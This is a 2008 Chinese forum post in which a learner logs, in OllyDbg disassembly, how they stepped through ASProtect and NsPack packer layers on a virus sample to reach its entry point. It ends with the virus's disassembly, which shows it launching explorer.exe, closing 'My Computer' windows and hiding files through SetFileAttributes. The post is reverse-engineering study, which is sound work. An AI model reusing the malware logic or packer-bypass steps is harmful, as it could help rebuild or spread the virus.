-
-
[旧帖] [分享]继续笨鸟脱壳的方法(脱下了!!!) 0.00雪花
-
发表于: 2008-3-8 09:33 3068
-
继续笨鸟脱壳的方法(脱下了!!!)
谢谢lovelyfrog、sskey、夜凉如水的热心帮助,
因为自己没上网,只能抽机会上网贴一些事先写好的东西,
所以一般就不能回帖感谢诸位了,
连上这次一块谢谢大侠们了,还有看雪这个宝地。
再次感谢诸位了,
接上回
00D8ED08 68 1F8724DD push DD24871F ;靠插件断在这里,只隐藏了一个peb
00D8ED0D 68 2C2A0000 push 2A2C
00D8ED12 68 900A0200 push 20A90
00D8ED17 68 C0200000 push 20C0
00D8ED1C 68 44CC0000 push 0CC44
00D8ED21 68 00F00400 push 4F000
00D8ED26 FF35 D434DC00 push dword ptr ds:[DC34D4]
00D8ED2C E8 23D1FFFF call 00D8BE54
00D8ED31 310424 xor dword ptr ss:[esp], eax
00D8ED34 8B05 D434DC00 mov eax, dword ptr ds:[DC34D4]
00D8ED3A 010424 add dword ptr ss:[esp], eax
00D8ED3D C3 retn ;返回
00D8ED3E C3 retn
00DC01D8 68 E1288508 push 88528E1 ;到这里
00DC01DD 68 E0020000 push 2E0
00DC01E2 68 04590100 push 15904
00DC01E7 68 C4170000 push 17C4
00DC01EC 68 10EA0300 push 3EA10
00DC01F1 68 00F00400 push 4F000
00DC01F6 FF35 D434DC00 push dword ptr ds:[DC34D4]
00DC01FC E8 01000000 call 00DC0202
00DC0201 8183 C404E84A B>add dword ptr ds:[ebx+4AE804C4], E8F>
00DC020B 0100 add dword ptr ds:[eax], eax
00DC020D 0000 add byte ptr ds:[eax], al
00DC020F 8183 C4043104 2>add dword ptr ds:[ebx+43104C4], 1E82>
00DC0219 0000 add byte ptr ds:[eax], al
00DC021B 68 83C4048B push 8B04C483
00DC0220 05 D434DC00 add eax, 0DC34D4
00DC0225 E8 02000000 call 00DC022C
00DC022A E8 6883C404 call 05A08597
00DC022F 010424 add dword ptr ss:[esp], eax
00DC0232 C3 retn ;f4, f8
00DBFADC E8 E7FEFFFF call 00DBF9C8 ;进
00DBF9C8 53 push ebx ;到这里
00DBF9C9 56 push esi
00DBF9CA 57 push edi
00DBF9CB 83C4 DC add esp, -24
00DBF9CE A1 9C2BDC00 mov eax, dword ptr ds:[DC2B9C]
00DBF9D3 C600 DF mov byte ptr ds:[eax], 0DF
00DBF9D6 A1 50B6DC00 mov eax, dword ptr ds:[DCB650]
00DBF9DB 894424 14 mov dword ptr ss:[esp+14], eax
00DBF9DF B8 34E8DB00 mov eax, 0DBE834
00DBF9E4 894424 18 mov dword ptr ss:[esp+18], eax
00DBF9E8 BA C8F9DB00 mov edx, 0DBF9C8
00DBF9ED 2BD0 sub edx, eax
00DBF9EF 895424 1C mov dword ptr ss:[esp+1C], edx
00DBF9F3 B8 40E6DB00 mov eax, 0DBE640
00DBF9F8 8B15 F02BDC00 mov edx, dword ptr ds:[DC2BF0]
00DBF9FE 8B12 mov edx, dword ptr ds:[edx]
00DBFA00 2B02 sub eax, dword ptr ds:[edx]
00DBFA02 894424 20 mov dword ptr ss:[esp+20], eax
00DBFA06 EB 06 jmp short 00DBFA0E
00DBFA08 FF25 C3EB01E8 jmp near dword ptr ds:[E801EBC3]
00DBFA0E 68 A7E8DB00 push 0DBE8A7
00DBFA13 58 pop eax
00DBFA14 40 inc eax
00DBFA15 68 1DFADB00 push 0DBFA1D
00DBFA1A 50 push eax
00DBFA1B ^ EB ED jmp short 00DBFA0A
00DBFA1D E8 1EF4FFFF call 00DBEE40
00DBFA22 A1 F02BDC00 mov eax, dword ptr ds:[DC2BF0]
00DBFA27 8B00 mov eax, dword ptr ds:[eax]
00DBFA29 8B70 1C mov esi, dword ptr ds:[eax+1C]
00DBFA2C A1 F02BDC00 mov eax, dword ptr ds:[DC2BF0]
00DBFA31 8B00 mov eax, dword ptr ds:[eax]
00DBFA33 8B38 mov edi, dword ptr ds:[eax]
00DBFA35 A1 F02BDC00 mov eax, dword ptr ds:[DC2BF0]
00DBFA3A 8B00 mov eax, dword ptr ds:[eax]
00DBFA3C 8D58 18 lea ebx, dword ptr ds:[eax+18]
00DBFA3F 833B 00 cmp dword ptr ds:[ebx], 0
00DBFA42 75 20 jnz short 00DBFA64
00DBFA44 83C6 20 add esi, 20
00DBFA47 A1 682ADC00 mov eax, dword ptr ds:[DC2A68]
00DBFA4C 80B8 2D010000 0>cmp byte ptr ds:[eax+12D], 0
00DBFA53 75 0F jnz short 00DBFA64
00DBFA55 B8 1F000000 mov eax, 1F
00DBFA5A E8 652EFCFF call 00D828C4
00DBFA5F C1E0 02 shl eax, 2
00DBFA62 2BF0 sub esi, eax
00DBFA64 E8 33EBFFFF call 00DBE59C
00DBFA69 833B 00 cmp dword ptr ds:[ebx], 0
00DBFA6C 74 05 je short 00DBFA73
00DBFA6E A3 8CB6DC00 mov dword ptr ds:[DCB68C], eax
00DBFA73 8B13 mov edx, dword ptr ds:[ebx]
00DBFA75 891424 mov dword ptr ss:[esp], edx
00DBFA78 897424 08 mov dword ptr ss:[esp+8], esi
00DBFA7C 894424 0C mov dword ptr ss:[esp+C], eax
00DBFA80 A1 9C2BDC00 mov eax, dword ptr ds:[DC2B9C]
00DBFA85 C600 E1 mov byte ptr ds:[eax], 0E1
00DBFA88 A1 58B6DC00 mov eax, dword ptr ds:[DCB658]
00DBFA8D E8 EE5DFFFF call 00DB5880
00DBFA92 A1 88B6DC00 mov eax, dword ptr ds:[DCB688]
00DBFA97 894424 04 mov dword ptr ss:[esp+4], eax
00DBFA9B 897C24 10 mov dword ptr ss:[esp+10], edi
00DBFA9F A1 242BDC00 mov eax, dword ptr ds:[DC2B24]
00DBFAA4 8B00 mov eax, dword ptr ds:[eax]
00DBFAA6 E8 6931FCFF call 00D82C14
00DBFAAB A1 58B6DC00 mov eax, dword ptr ds:[DCB658]
00DBFAB0 E8 5F31FCFF call 00D82C14
00DBFAB5 A1 9C2BDC00 mov eax, dword ptr ds:[DC2B9C]
00DBFABA C600 E3 mov byte ptr ds:[eax], 0E3
00DBFABD 8BD4 mov edx, esp
00DBFABF A1 94B6DC00 mov eax, dword ptr ds:[DCB694]
00DBFAC4 E8 23B9FFFF call 00DBB3EC
00DBFAC9 E8 8E3CFFFF call 00DB375C
00DBFACE E8 61EDFFFF call 00DBE834 ; f4,f8只是跟着做,好像是说三个call相近
00DBE834 /65:EB 01 jmp short 00DBE838 ; 到这后看到一片红 ctrl+f9运行到返回
00DBE837 |C783 D16A13CD B>mov dword ptr ds:[ebx+CD136AD1], 49F>
00DBE841 0003 add byte ptr ds:[ebx], al
00DBE843 4C dec esp
00DBE844 24 18 and al, 18
00DBE846 B9 46624900 mov ecx, 496246
00DBE84B B9 FE224A00 mov ecx, 4A22FE
00DBE850 8D8C22 00000000 lea ecx, dword ptr ds:[edx]
00DBE857 EB 02 jmp short 00DBE85B
00DBE859 CD20 2BCA85C9 vxdjump C985CA2B
00DBE85F 0F85 E7000000 jnz 00DBE94C
00DBE865 C1DA 13 rcr edx, 13
\\\\\\\\\\\\\\\\\、、、、、省略、、、、、、、、、、、、、
01F80000 0FB7F7 movzx esi, di ;停在这里
01F80003 66:81D2 BD25 adc dx, 25BD
01F80008 E8 07000000 call 01F80014 ; 进
01F80014 0FB7FF movzx edi, di ; 往后就和教程不一样了,我试了只能见call进
01F80017 5B pop ebx
01F80018 BF B0ABA72B mov edi, 2BA7ABB0
01F8001D 81C3 31010000 add ebx, 131
01F80023 68 4FCB957B push 7B95CB4F
01F80028 0F8A 02000000 jpe 01F80030
01F8002E 52 push edx
01F8002F 5A pop edx
01F80030 5E pop esi
01F80031 81DE 0CAB9F6B sbb esi, 6B9FAB0C
01F80037 68 6A76D65A push 5AD6766A
01F8003C 66:BE 379E mov si, 9E37
01F80040 5E pop esi
01F80041 B9 0B000000 mov ecx, 0B
01F80046 0F82 05000000 jb 01F80051
01F8004C BF 3CEFE942 mov edi, 42E9EF3C
01F80051 E8 0F000000 call 01F80065 ; 进
01F80065 68 58468310 push 10834658
01F8006A 66:BF 9CBB mov di, 0BB9C
01F8006E 56 push esi
01F8006F 5F pop edi
01F80070 5F pop edi
01F80071 5E pop esi
01F80072 FF33 push dword ptr ds:[ebx]
01F80074 E8 05000000 call 01F8007E ; 进
01F8007E 50 push eax ; 到这
01F8007F 68 CD126831 push 316812CD
01F80084 5E pop esi
01F80085 5F pop edi
01F80086 5A pop edx
01F80087 58 pop eax
01F80088 66:BF A634 mov di, 34A6
01F8008C 81C6 00BC791E add esi, 1E79BC00
01F80092 81F0 77226445 xor eax, 45642277
01F80098 8BF2 mov esi, edx
01F8009A 81F0 E41E2D6D xor eax, 6D2D1EE4
01F800A0 66:8BF7 mov si, di
01F800A3 51 push ecx
01F800A4 0FBFF9 movsx edi, cx
01F800A7 53 push ebx
01F800A8 5F pop edi
01F800A9 5E pop esi
01F800AA 8BD1 mov edx, ecx
01F800AC 81F0 4DCFF703 xor eax, 3F7CF4D
01F800B2 66:81E6 78F5 and si, 0F578
01F800B7 E9 0B000000 jmp 01F800C7 ; 跳下
01F800C7 8903 mov dword ptr ds:[ebx], eax
01F800C9 BA 66F70029 mov edx, 2900F766
01F800CE 83EB 02 sub ebx, 2
01F800D1 4B dec ebx
01F800D2 4B dec ebx
01F800D3 BE BBAE5C5E mov esi, 5E5CAEBB
01F800D8 66:8BF3 mov si, bx
01F800DB 8BF0 mov esi, eax
01F800DD 49 dec ecx
01F800DE ^ 0F85 8EFFFFFF jnz 01F80072 ; 跳上
01F800E4 53 push ebx ; 上边是个循环,下断这里
01F800E5 E8 0E000000 call 01F800F8 ; F7
01F800F8 81CF 0502666D or edi, 6D660205 ; 到这里
01F800FE E8 10000000 call 01F80113 ; 进
01F80113 5E pop esi ; 01F80103
01F80114 5A pop edx
01F80115 5E pop esi
01F80116 EB 01 jmp short 01F80119 ; 跳
01F80119 83CB EF or ebx, FFFFFFEF
01F8011C 035C24 18 add ebx, dword ptr ss:[esp+18]
01F80120 5B pop ebx
01F80121 8D4447 2D lea eax, dword ptr ds:[edi+eax*2+2D]
01F80125 58 pop eax
01F80126 EB 02 jmp short 01F8012A
01F8012A 8D80 9004BE3B lea eax, dword ptr ds:[eax+3BBE0490]
01F80130 03C3 add eax, ebx
01F80132 5C pop esp
01F80133 FFE0 jmp near eax ; call来跳去的不过还好最后还是出来了;
跳出了aspr.
\\\\\\\\\\\\\\\\\\\\\又跳进一个壳NsPacK,首次遇上,找了个例子借鉴\\\\\
0041A3D3 9C pushfd ; 就是这,开始我还以为这就是oep,还想可能因为
0041A3D4 60 pushad ; 是病毒,有点别扭,本以为脱aspr是要修复iat的
0041A3D5 E8 00000000 call 0041A3DA ; 没想到dump下来一看又是一个壳,
0041A3DA 5D pop ebp
0041A3DB 83ED 07 sub ebp, 7
0041A3DE 8D8D A9FCFFFF lea ecx, dword ptr ss:[ebp-357]
0041A3E4 8039 01 cmp byte ptr ds:[ecx], 1
0041A3E7 0F84 42020000 je 0041A62F
0041A3ED C601 01 mov byte ptr ds:[ecx], 1
0041A3F0 8BC5 mov eax, ebp
0041A3F2 2B85 3DFCFFFF sub eax, dword ptr ss:[ebp-3C3]
0041A3F8 8985 3DFCFFFF mov dword ptr ss:[ebp-3C3], eax
0041A3FE 0185 6DFCFFFF add dword ptr ss:[ebp-393], eax
0041A404 8DB5 B1FCFFFF lea esi, dword ptr ss:[ebp-34F]
0041A40A 0106 add dword ptr ds:[esi], eax
0041A40C 55 push ebp
0041A40D 56 push esi
0041A40E 6A 40 push 40
0041A410 68 00100000 push 1000
0041A415 68 00100000 push 1000
0041A41A 6A 00 push 0
0041A41C FF95 D5FCFFFF call near dword ptr ss:[ebp-32B]
0041A422 85C0 test eax, eax
0041A424 0F84 69030000 je 0041A793
0041A42A 8985 65FCFFFF mov dword ptr ss:[ebp-39B], eax
0041A430 E8 00000000 call 0041A435
0041A435 5B pop ebx
0041A436 B9 67030000 mov ecx, 367
0041A43B 03D9 add ebx, ecx
0041A43D 50 push eax
0041A43E 53 push ebx
0041A43F E8 B0020000 call 0041A6F4
0041A444 5E pop esi
0041A445 5D pop ebp
0041A446 8B36 mov esi, dword ptr ds:[esi]
0041A448 8BFD mov edi, ebp
0041A44A 03BD 2DFCFFFF add edi, dword ptr ss:[ebp-3D3]
0041A450 8BDF mov ebx, edi
0041A452 833F 00 cmp dword ptr ds:[edi], 0
0041A455 75 0A jnz short 0041A461
0041A457 83C7 04 add edi, 4
0041A45A B9 00000000 mov ecx, 0
0041A45F EB 16 jmp short 0041A477
0041A461 B9 01000000 mov ecx, 1
0041A466 033B add edi, dword ptr ds:[ebx]
0041A468 83C3 04 add ebx, 4
0041A46B 833B 00 cmp dword ptr ds:[ebx], 0
0041A46E 74 34 je short 0041A4A4
0041A470 0113 add dword ptr ds:[ebx], edx
0041A472 8B33 mov esi, dword ptr ds:[ebx]
0041A474 037B 04 add edi, dword ptr ds:[ebx+4]
0041A477 57 push edi
0041A478 51 push ecx
0041A479 53 push ebx
0041A47A FFB5 D9FCFFFF push dword ptr ss:[ebp-327]
0041A480 FFB5 D5FCFFFF push dword ptr ss:[ebp-32B]
0041A486 8BD6 mov edx, esi
0041A488 8BCF mov ecx, edi
0041A48A 8B85 65FCFFFF mov eax, dword ptr ss:[ebp-39B]
0041A490 05 AA050000 add eax, 5AA
0041A495 FFD0 call near eax
0041A497 5B pop ebx
0041A498 59 pop ecx
0041A499 5F pop edi
0041A49A 83F9 00 cmp ecx, 0
0041A49D 74 05 je short 0041A4A4
0041A49F 83C3 08 add ebx, 8
0041A4A2 ^ EB C7 jmp short 0041A46B
0041A4A4 68 00800000 push 8000
0041A4A9 6A 00 push 0
0041A4AB FFB5 65FCFFFF push dword ptr ss:[ebp-39B]
0041A4B1 FF95 D9FCFFFF call near dword ptr ss:[ebp-327]
0041A4B7 8DB5 6DFCFFFF lea esi, dword ptr ss:[ebp-393]
0041A4BD 8B4E 08 mov ecx, dword ptr ds:[esi+8]
0041A4C0 8D56 10 lea edx, dword ptr ds:[esi+10]
0041A4C3 8B36 mov esi, dword ptr ds:[esi]
0041A4C5 8BFE mov edi, esi
0041A4C7 83F9 00 cmp ecx, 0
0041A4CA 74 3F je short 0041A50B
0041A4CC 8A07 mov al, byte ptr ds:[edi]
0041A4CE 47 inc edi
0041A4CF 2C E8 sub al, 0E8
0041A4D1 3C 01 cmp al, 1
0041A4D3 ^ 77 F7 ja short 0041A4CC
0041A4D5 8B07 mov eax, dword ptr ds:[edi]
0041A4D7 807A 01 00 cmp byte ptr ds:[edx+1], 0
0041A4DB 74 14 je short 0041A4F1
0041A4DD 8A1A mov bl, byte ptr ds:[edx]
0041A4DF 381F cmp byte ptr ds:[edi], bl
0041A4E1 ^ 75 E9 jnz short 0041A4CC
0041A4E3 8A5F 04 mov bl, byte ptr ds:[edi+4]
0041A4E6 66:C1E8 08 shr ax, 8
0041A4EA C1C0 10 rol eax, 10
0041A4ED 86C4 xchg ah, al
0041A4EF EB 0A jmp short 0041A4FB
0041A4F1 8A5F 04 mov bl, byte ptr ds:[edi+4]
0041A4F4 86C4 xchg ah, al
0041A4F6 C1C0 10 rol eax, 10
0041A4F9 86C4 xchg ah, al
0041A4FB 2BC7 sub eax, edi
0041A4FD 03C6 add eax, esi
0041A4FF 8907 mov dword ptr ds:[edi], eax
0041A501 83C7 05 add edi, 5
0041A504 80EB E8 sub bl, 0E8
0041A507 8BC3 mov eax, ebx
0041A509 ^ E2 C6 loopd short 0041A4D1
0041A50B E8 3A010000 call 0041A64A
0041A510 8D8D 81FCFFFF lea ecx, dword ptr ss:[ebp-37F]
0041A516 8B41 08 mov eax, dword ptr ds:[ecx+8]
0041A519 83F8 00 cmp eax, 0
0041A51C 0F84 81000000 je 0041A5A3
0041A522 8BF2 mov esi, edx
0041A524 2B71 10 sub esi, dword ptr ds:[ecx+10]
0041A527 74 7A je short 0041A5A3
0041A529 8971 10 mov dword ptr ds:[ecx+10], esi
0041A52C 8DB5 B1FCFFFF lea esi, dword ptr ss:[ebp-34F]
0041A532 8B36 mov esi, dword ptr ds:[esi]
0041A534 8D5E FC lea ebx, dword ptr ds:[esi-4]
0041A537 8B01 mov eax, dword ptr ds:[ecx]
0041A539 83F8 01 cmp eax, 1
0041A53C 74 0A je short 0041A548
0041A53E 8BFA mov edi, edx
0041A540 0379 08 add edi, dword ptr ds:[ecx+8]
0041A543 8B49 10 mov ecx, dword ptr ds:[ecx+10]
0041A546 EB 08 jmp short 0041A550
0041A548 8BFE mov edi, esi
0041A54A 0379 08 add edi, dword ptr ds:[ecx+8]
0041A54D 8B49 10 mov ecx, dword ptr ds:[ecx+10]
0041A550 33C0 xor eax, eax
0041A552 8A07 mov al, byte ptr ds:[edi]
0041A554 47 inc edi
0041A555 0BC0 or eax, eax
0041A557 74 20 je short 0041A579
0041A559 3C EF cmp al, 0EF
0041A55B 77 06 ja short 0041A563
0041A55D 03D8 add ebx, eax
0041A55F 010B add dword ptr ds:[ebx], ecx
0041A561 ^ EB ED jmp short 0041A550
0041A563 24 0F and al, 0F
0041A565 C1E0 10 shl eax, 10
0041A568 66:8B07 mov ax, word ptr ds:[edi]
0041A56B 83C7 02 add edi, 2
0041A56E 0BC0 or eax, eax
0041A570 ^ 75 EB jnz short 0041A55D
0041A572 8B07 mov eax, dword ptr ds:[edi]
0041A574 83C7 04 add edi, 4
0041A577 ^ EB E4 jmp short 0041A55D
0041A579 33DB xor ebx, ebx
0041A57B 87FE xchg esi, edi
0041A57D 8B06 mov eax, dword ptr ds:[esi]
0041A57F 83F8 00 cmp eax, 0
0041A582 74 1F je short 0041A5A3
0041A584 AD lodsd
0041A585 0BC0 or eax, eax
0041A587 74 08 je short 0041A591
0041A589 03D8 add ebx, eax
0041A58B 66:010C1F add word ptr ds:[edi+ebx], cx
0041A58F ^ EB F3 jmp short 0041A584
0041A591 33DB xor ebx, ebx
0041A593 C1E9 10 shr ecx, 10
0041A596 AD lodsd
0041A597 0BC0 or eax, eax
0041A599 74 08 je short 0041A5A3
0041A59B 03D8 add ebx, eax
0041A59D 66:010C1F add word ptr ds:[edi+ebx], cx
0041A5A1 ^ EB F3 jmp short 0041A596
0041A5A3 8DB5 3DFCFFFF lea esi, dword ptr ss:[ebp-3C3]
0041A5A9 8B16 mov edx, dword ptr ds:[esi]
0041A5AB 8DB5 99FCFFFF lea esi, dword ptr ss:[ebp-367]
0041A5B1 8A06 mov al, byte ptr ds:[esi]
0041A5B3 3C 01 cmp al, 1
0041A5B5 75 3F jnz short 0041A5F6
0041A5B7 0356 04 add edx, dword ptr ds:[esi+4]
0041A5BA 56 push esi
0041A5BB 52 push edx
0041A5BC 56 push esi
0041A5BD 6A 04 push 4
0041A5BF 68 00010000 push 100
0041A5C4 52 push edx
0041A5C5 FF95 D1FCFFFF call near dword ptr ss:[ebp-32F]
0041A5CB 5F pop edi
0041A5CC 5E pop esi
0041A5CD 83F8 01 cmp eax, 1
0041A5D0 0F85 BD010000 jnz 0041A793
0041A5D6 83C6 08 add esi, 8
0041A5D9 B9 08000000 mov ecx, 8
0041A5DE F3:A4 rep movsb
0041A5E0 83EE 0C sub esi, 0C
0041A5E3 83EF 08 sub edi, 8
0041A5E6 56 push esi
0041A5E7 FF76 FC push dword ptr ds:[esi-4]
0041A5EA 68 00010000 push 100
0041A5EF 57 push edi
0041A5F0 FF95 D1FCFFFF call near dword ptr ss:[ebp-32F]
0041A5F6 55 push ebp
0041A5F7 5B pop ebx
0041A5F8 81EB 15000000 sub ebx, 15
0041A5FE 33C9 xor ecx, ecx
0041A600 8A0B mov cl, byte ptr ds:[ebx]
0041A602 80F9 00 cmp cl, 0
0041A605 74 28 je short 0041A62F
0041A607 43 inc ebx
0041A608 8DB5 3DFCFFFF lea esi, dword ptr ss:[ebp-3C3]
0041A60E 8B16 mov edx, dword ptr ds:[esi]
0041A610 56 push esi
0041A611 51 push ecx
0041A612 53 push ebx
0041A613 52 push edx
0041A614 56 push esi
0041A615 FF33 push dword ptr ds:[ebx]
0041A617 FF73 04 push dword ptr ds:[ebx+4]
0041A61A 8B43 08 mov eax, dword ptr ds:[ebx+8]
0041A61D 03C2 add eax, edx
0041A61F 50 push eax
0041A620 FF95 D1FCFFFF call near dword ptr ss:[ebp-32F]
0041A626 5A pop edx
0041A627 5B pop ebx
0041A628 59 pop ecx
0041A629 5E pop esi
0041A62A 83C3 0C add ebx, 0C
0041A62D ^ E2 E1 loopd short 0041A610
0041A62F B8 00000000 mov eax, 0
0041A634 83F8 00 cmp eax, 0
0041A637 74 0A je short 0041A643
0041A639 61 popad
0041A63A 9D popfd
0041A63B B8 01000000 mov eax, 1
0041A640 C2 0C00 retn 0C
0041A643 61 popad
0041A644 9D popfd
0041A645 - E9 DE4CFFFF jmp 0040F328
; 第二个壳就不像借鉴的例子那样,一路f8,就跳向oep
也是直接dump下来的,没敢试运行一下,直接进od了,所以也不知道用不用修复。
不过看程序好像不用。
\\\\\\\\\\\\\\\\\\\\\\\千辛万苦终于让我给找到了,真想说找你不容易呀oep.\\\\\\\\
下面就是病毒源码了,先贴出来晒晒,还没开始跟呢,今天还发现虚拟机的好处了,不想跟了,可以保存现状,
、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、
peid查为Delphi的。
0040F328 >/$ 55 push ebp
0040F329 |. 8BEC mov ebp, esp
0040F32B |. B9 32000000 mov ecx, 32
0040F330 |> 6A 00 /push 0
0040F332 |. 6A 00 |push 0
0040F334 |. 49 |dec ecx
0040F335 |.^ 75 F9 \jnz short 0040F330
0040F337 |. 51 push ecx
0040F338 |. 53 push ebx
0040F339 |. 56 push esi
0040F33A |. 57 push edi
0040F33B |. B8 C0F24000 mov eax, 0040F2C0
0040F340 |. E8 1352FFFF call 00404558
0040F345 |. 8B3D 58144100 mov edi, dword ptr ds:[411458] ; 1.004113D8
0040F34B |. 33C0 xor eax, eax
0040F34D |. 55 push ebp
0040F34E |. 68 1E034100 push 0041031E
0040F353 |. 64:FF30 push dword ptr fs:[eax]
0040F356 |. 64:8920 mov dword ptr fs:[eax], esp
0040F359 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F35E |. BA 04010000 mov edx, 104
0040F363 |. E8 584CFFFF call 00403FC0
0040F368 |. 68 04010000 push 104
0040F36D |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F372 |. 8B00 mov eax, dword ptr ds:[eax]
0040F374 |. E8 1F4BFFFF call 00403E98
0040F379 |. 50 push eax ; |PathBuffer
0040F37A |. A1 50264100 mov eax, dword ptr ds:[412650] ; |
0040F37F |. 50 push eax ; |hModule => NULL
0040F380 |. E8 9753FFFF call <jmp.&kernel32.GetModuleFileName>; \GetModuleFileNameA
0040F385 |. 8BD0 mov edx, eax
0040F387 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F38C |. E8 2F4CFFFF call 00403FC0
0040F391 |. E8 B28FFFFF call 00408348
0040F396 |. BE 17000000 mov esi, 17
0040F39B |. 8B1D 84144100 mov ebx, dword ptr ds:[411484] ; 1.004110CC
0040F3A1 |> A1 58154100 /mov eax, dword ptr ds:[411558]
0040F3A6 |. 8B13 |mov edx, dword ptr ds:[ebx]
0040F3A8 |. E8 BB47FFFF |call 00403B68
0040F3AD |. 8D55 EC |lea edx, dword ptr ss:[ebp-14]
0040F3B0 |. A1 34154100 |mov eax, dword ptr ds:[411534]
0040F3B5 |. 8B00 |mov eax, dword ptr ds:[eax]
0040F3B7 |. E8 4470FFFF |call 00406400
0040F3BC |. 8B45 EC |mov eax, dword ptr ss:[ebp-14]
0040F3BF |. 50 |push eax
0040F3C0 |. A1 58154100 |mov eax, dword ptr ds:[411558]
0040F3C5 |. FF30 |push dword ptr ds:[eax]
0040F3C7 |. A1 50154100 |mov eax, dword ptr ds:[411550]
0040F3CC |. FF30 |push dword ptr ds:[eax]
0040F3CE |. FF37 |push dword ptr ds:[edi]
0040F3D0 |. 8D45 E4 |lea eax, dword ptr ss:[ebp-1C]
0040F3D3 |. BA 03000000 |mov edx, 3
0040F3D8 |. E8 7B49FFFF |call 00403D58
0040F3DD |. 8B45 E4 |mov eax, dword ptr ss:[ebp-1C]
0040F3E0 |. 8D55 E8 |lea edx, dword ptr ss:[ebp-18]
0040F3E3 |. E8 1870FFFF |call 00406400
0040F3E8 |. 8B55 E8 |mov edx, dword ptr ss:[ebp-18]
0040F3EB |. 58 |pop eax
0040F3EC |. E8 F349FFFF |call 00403DE4
0040F3F1 |. 0F85 A5010000 |jnz 0040F59C
0040F3F7 |. 6A 01 |push 1
0040F3F9 |. 8D45 DC |lea eax, dword ptr ss:[ebp-24]
0040F3FC |. E8 D384FFFF |call 004078D4
0040F401 |. FF75 DC |push dword ptr ss:[ebp-24]
0040F404 |. 68 38034100 |push 00410338 ; ASCII "explorer.exe "
0040F409 |. A1 58154100 |mov eax, dword ptr ds:[411558]
0040F40E |. FF30 |push dword ptr ds:[eax]
0040F410 |. 8D45 E0 |lea eax, dword ptr ss:[ebp-20]
0040F413 |. BA 03000000 |mov edx, 3
0040F418 |. E8 3B49FFFF |call 00403D58
0040F41D |. 8B45 E0 |mov eax, dword ptr ss:[ebp-20]
0040F420 |. E8 734AFFFF |call 00403E98
0040F425 |. 50 |push eax ; |CmdLine
0040F426 |. E8 7953FFFF |call <jmp.&kernel32.WinExec> ; \WinExec
0040F42B |. 6A 00 |push 0 ; /lParam = 0
0040F42D |. 6A 00 |push 0 ; |wParam = 0
0040F42F |. 6A 10 |push 10 ; |Message = WM_CLOSE
0040F431 |. 68 48034100 |push 00410348 ; |/Title = "我的电脑"
0040F436 |. 6A 00 |push 0 ; ||Class = 0
0040F438 |. E8 8753FFFF |call <jmp.&user32.FindWindowA> ; |\FindWindowA
0040F43D |. 50 |push eax ; |hWnd
0040F43E |. E8 C953FFFF |call <jmp.&user32.PostMessageA> ; \PostMessageA
0040F443 |. 6A 00 |push 0 ; /lParam = 0
0040F445 |. 6A 00 |push 0 ; |wParam = 0
0040F447 |. 6A 10 |push 10 ; |Message = WM_CLOSE
0040F449 |. 68 54034100 |push 00410354 ; |/Title = "我的電腦"
0040F44E |. 6A 00 |push 0 ; ||Class = 0
0040F450 |. E8 6F53FFFF |call <jmp.&user32.FindWindowA> ; |\FindWindowA
0040F455 |. 50 |push eax ; |hWnd
0040F456 |. E8 B153FFFF |call <jmp.&user32.PostMessageA> ; \PostMessageA
0040F45B |. 6A 00 |push 0 ; /lParam = 0
0040F45D |. 6A 00 |push 0 ; |wParam = 0
0040F45F |. 6A 10 |push 10 ; |Message = WM_CLOSE
0040F461 |. 68 60034100 |push 00410360 ; |/Title = "My Computer"
0040F466 |. 6A 00 |push 0 ; ||Class = 0
0040F468 |. E8 5753FFFF |call <jmp.&user32.FindWindowA> ; |\FindWindowA
0040F46D |. 50 |push eax ; |hWnd
0040F46E |. E8 9953FFFF |call <jmp.&user32.PostMessageA> ; \PostMessageA
0040F473 |. 6A 06 |push 6
0040F475 |. A1 58154100 |mov eax, dword ptr ds:[411558]
0040F47A |. FF30 |push dword ptr ds:[eax]
0040F47C |. A1 50154100 |mov eax, dword ptr ds:[411550]
0040F481 |. FF30 |push dword ptr ds:[eax]
0040F483 |. FF37 |push dword ptr ds:[edi]
0040F485 |. 8D45 D8 |lea eax, dword ptr ss:[ebp-28]
0040F488 |. BA 03000000 |mov edx, 3
0040F48D |. E8 C648FFFF |call 00403D58
0040F492 |. 8B45 D8 |mov eax, dword ptr ss:[ebp-28]
0040F495 |. E8 FE49FFFF |call 00403E98
0040F49A |. 50 |push eax ; |FileName
0040F49B |. E8 EC52FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F4A0 |. 6A 06 |push 6
0040F4A2 |. 8B0D A4144100 |mov ecx, dword ptr ds:[4114A4] ; 1.004113E0
0040F4A8 |. 8B09 |mov ecx, dword ptr ds:[ecx]
0040F4AA |. 8B15 58154100 |mov edx, dword ptr ds:[411558] ; 1.004130F8
0040F4B0 |. 8B12 |mov edx, dword ptr ds:[edx]
0040F4B2 |. 8D45 D4 |lea eax, dword ptr ss:[ebp-2C]
0040F4B5 |. E8 2A48FFFF |call 00403CE4
0040F4BA |. 8B45 D4 |mov eax, dword ptr ss:[ebp-2C]
0040F4BD |. E8 D649FFFF |call 00403E98
0040F4C2 |. 50 |push eax ; |FileName
0040F4C3 |. E8 C452FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F4C8 |. 6A 06 |push 6
0040F4CA |. 8D45 D0 |lea eax, dword ptr ss:[ebp-30]
0040F4CD |. E8 B284FFFF |call 00407984
0040F4D2 |. 8D45 D0 |lea eax, dword ptr ss:[ebp-30]
0040F4D5 |. 8B15 B4144100 |mov edx, dword ptr ds:[4114B4] ; 1.004113D4
0040F4DB |. 8B12 |mov edx, dword ptr ds:[edx]
0040F4DD |. E8 BE47FFFF |call 00403CA0
0040F4E2 |. 8B45 D0 |mov eax, dword ptr ss:[ebp-30]
0040F4E5 |. E8 AE49FFFF |call 00403E98
0040F4EA |. 50 |push eax ; |FileName
0040F4EB |. E8 9C52FFFF |call <jmp.&kernel32.SetFileAttribute>; \SetFileAttributesA
0040F4F0 |. 6A 06 |push 6
0040F4F2 |. 8D45 C8 |lea eax, dword ptr ss:[ebp-38]
0040F4F5 |. E8 2685FFFF |call 00407A20
0040F4FA |. FF75 C8 |push dword ptr ss:[ebp-38]
0040F4FD |. A1 5C144100 |mov eax, dword ptr ds:[41145C]
0040F502 |. FF30 |push dword ptr ds:[eax]
0040F504 |. FF37 |push dword ptr ds:[edi]
0040F506 |. 8D45 CC |lea eax, dword ptr ss:[ebp-34]
0040F509 |. BA 03000000 |mov edx, 3
0040F50E |. E8 4548FFFF |call 00403D58
